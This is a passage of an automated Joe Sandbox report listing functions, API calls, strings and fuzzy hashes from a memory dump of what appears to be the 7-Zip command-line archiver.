                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$freememset
                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                • API String ID: 2276422817-3653984579
                                                                                                                                                                                                                                • Opcode ID: e9bcf27acdf7ac2d6e3f3cae4111de8fb74b4034055df34e1a2709ccc6db0766
                                                                                                                                                                                                                                • Instruction ID: 57aea0fb1263d985c4b7cec5ce74be5a24a252cc15496fcd89aea5f9371b57d4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9bcf27acdf7ac2d6e3f3cae4111de8fb74b4034055df34e1a2709ccc6db0766
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5311B426350A4261CA28EF35D9543AD6360BBB5BE4F584232EF3E43796DF38D4A5C340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021B8EB
                                                                                                                                                                                                                                • free.MSVCRT ref: 0021B90A
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$freememset
                                                                                                                                                                                                                                • String ID: ERROR: $WARNING:
                                                                                                                                                                                                                                • API String ID: 2276422817-2114518728
                                                                                                                                                                                                                                • Opcode ID: ecca43dc8351b2c902a0e5034670fe1dd14c0eeed9385964c550ca002694eadf
                                                                                                                                                                                                                                • Instruction ID: 857bae32a8b2774c956b1f6542f14e9b051af83a4e92b5d41cb4eedb4ded017e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ecca43dc8351b2c902a0e5034670fe1dd14c0eeed9385964c550ca002694eadf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64116012301A9191DA25EF66E9557AE6320BBB9BE4F488222EF7F17391DF3CC485C310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterLeavefputs
                                                                                                                                                                                                                                • String ID: ERROR:
                                                                                                                                                                                                                                • API String ID: 4171338575-977468659
                                                                                                                                                                                                                                • Opcode ID: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
                                                                                                                                                                                                                                • Instruction ID: 4c0e5ce31e4d4091e530993d77bc55a1606709e639226b02e1a37a4f313884f6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE11BC3231198595DB05DF25ED443E86361BBA9BA4F588232EF6E1B3A8CF388499C310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021BC6C
                                                                                                                                                                                                                                • free.MSVCRT ref: 0021BC78
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$freememset
                                                                                                                                                                                                                                • String ID: Archive size: $Files read from disk
                                                                                                                                                                                                                                • API String ID: 2276422817-3736835528
                                                                                                                                                                                                                                • Opcode ID: 967efb6c8fd20dc29b92a159685723dba0981b3595675872516f3ccef425e8c4
                                                                                                                                                                                                                                • Instruction ID: 6def7509671807fac471a8a448a59997927523e644dfbd92e65139704df79404
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 967efb6c8fd20dc29b92a159685723dba0981b3595675872516f3ccef425e8c4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD11516320494190CE20EF64D8A139D6331FBE47A8F845223EA6E476B9DF78C68AC700
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: a$z
                                                                                                                                                                                                                                • API String ID: 0-4151050625
                                                                                                                                                                                                                                • Opcode ID: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                                                                                                                                                                                • Instruction ID: d70cd6f0e9f57dc5310d165ff3b8179c6e7fe5bda641ef57cb42283cdb5a9151
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B016967B0507985EB2C7B25A9B43F8A2529735B99F8E4173CEB907310E33A49D2E311
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                                                                                                                • API String ID: 1646373207-1489217083
                                                                                                                                                                                                                                • Opcode ID: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                                                                                                                                                                                • Instruction ID: cc31c2a24ca8de0fd9702dceacbc076c4dde17d8a9432e6f2804717492f28fe5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33F0AF3231494486DB34DBA0F5C83A963A1AB98326F840836E65B42B60DB3CC989CA01
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021BACF
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021BAFC
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free
                                                                                                                                                                                                                                • String ID: Open archive: $StdOut
                                                                                                                                                                                                                                • API String ID: 3873070119-2401103298
                                                                                                                                                                                                                                • Opcode ID: 5c408db9bf12223247ae41b3a4b257e588f5b2f357ad56df3248e673553bd93f
                                                                                                                                                                                                                                • Instruction ID: 0d3895122f093827a3c8b3cfeee3492c6a8879dca11db147bf63963345916f59
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c408db9bf12223247ae41b3a4b257e588f5b2f357ad56df3248e673553bd93f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4F05EA531488591CE419F26DA893AD6371FB68FD4F58D432CD1E4B718DF28C499C310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$fputc
                                                                                                                                                                                                                                • String ID: $:
                                                                                                                                                                                                                                • API String ID: 1185151155-4041779174
                                                                                                                                                                                                                                • Opcode ID: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
                                                                                                                                                                                                                                • Instruction ID: 64716845605c713fcee0d6d39816e2ec03fefc58e2f6b994b510b72af45ac326
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CE06DA6304A8091CB159B26E95839DA321FBA9FCCF489122EE9E07719DF2CC108C711
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: GetLargePageMinimum$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 1646373207-2515562745
                                                                                                                                                                                                                                • Opcode ID: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                                                                                                                                                                                • Instruction ID: ed937d36f5863f28f842cc7e041fb46f47b3dd0e4aaee48b02344657f2a529d5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCE0BF35766B02E1EE45DF55FD993A423A1BBA5704FD40539891E52360EF3CC255C350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 408039514-0
                                                                                                                                                                                                                                • Opcode ID: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
                                                                                                                                                                                                                                • Instruction ID: ee98c565c6fc32391576f2e3228266d3570549dccee02e5b81267ad3a47b5904
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15816932629B4186CB24DF25D48071EB775F798BA4F544226EF9E43BA9EF38D861C700
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
                                                                                                                                                                                                                                • Instruction ID: 295761ce59e2f7fa56d975152b7eb349f8edd0a212f3f3f4f17cff86fa28ac44
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7141C227715AC097CB30DE23E54026E6761FBA6BE4F489222EFAA07B59DF38D545C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 2d6c9dfe1155a16f3a068d7370a8ec758800c3918b65cbcdfef43df97f9f1dc5
                                                                                                                                                                                                                                • Instruction ID: f4a7b8aed6f72368ee8000346e731a6e50f23dd77ad95d2ee005f86b5903b68c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d6c9dfe1155a16f3a068d7370a8ec758800c3918b65cbcdfef43df97f9f1dc5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B41EA672187C085C720EA25E48015FAFB1F3D6798F184115FF9607B9AC7BED099CB11
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ErrorLastmemmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3561842085-0
                                                                                                                                                                                                                                • Opcode ID: 835e30b8a2ce9afd242e3c27a4bd6d2521a716217a04de116505d45ba31023b0
                                                                                                                                                                                                                                • Instruction ID: 8f9f8ceb89779f2edd0fb8da7e5d9084c817c78f926cb176217c6fdf524f4a21
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 835e30b8a2ce9afd242e3c27a4bd6d2521a716217a04de116505d45ba31023b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61318172224B4191CB60DF24E49025E7770FBA9BA4F945222FBAE47BA9DF38C559C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 9a39179057fc4b698db1469c34720306d33abb4d3d1416dbc86e8f68b6a95521
                                                                                                                                                                                                                                • Instruction ID: 0be7a525bf66ea9a3b62cb3f8eab79c4901bc9763dfa07068e027d59f5fcd82b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a39179057fc4b698db1469c34720306d33abb4d3d1416dbc86e8f68b6a95521
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3421C13271178497CA14EF5AE9842297360F764BE4B08823AEF3E0B795DF34D962C310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                                                • Opcode ID: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                                                                                                                                                                                • Instruction ID: 0df09e65fac8ff61f46467e25da4d2920a87805bdfc6f862321cc6ce14e5417f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 111102B2308742A1EF089F66DC653E82365DB19FC4F868826CE099B305EF38CE95C744
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 001D3C2A
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 001D3C36
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001D3C54
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 001D3C80
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001D3C9E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2296236218-0
                                                                                                                                                                                                                                • Opcode ID: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                                                                                                                                                                                • Instruction ID: 4bce730eb5de8843d289b3deecd762786e632394a291639ce8ad96b97338df40
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4021DFB2700B4886DB20DF26E85475EB7A0FB98F88F448126DE9C83724EF38C945C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
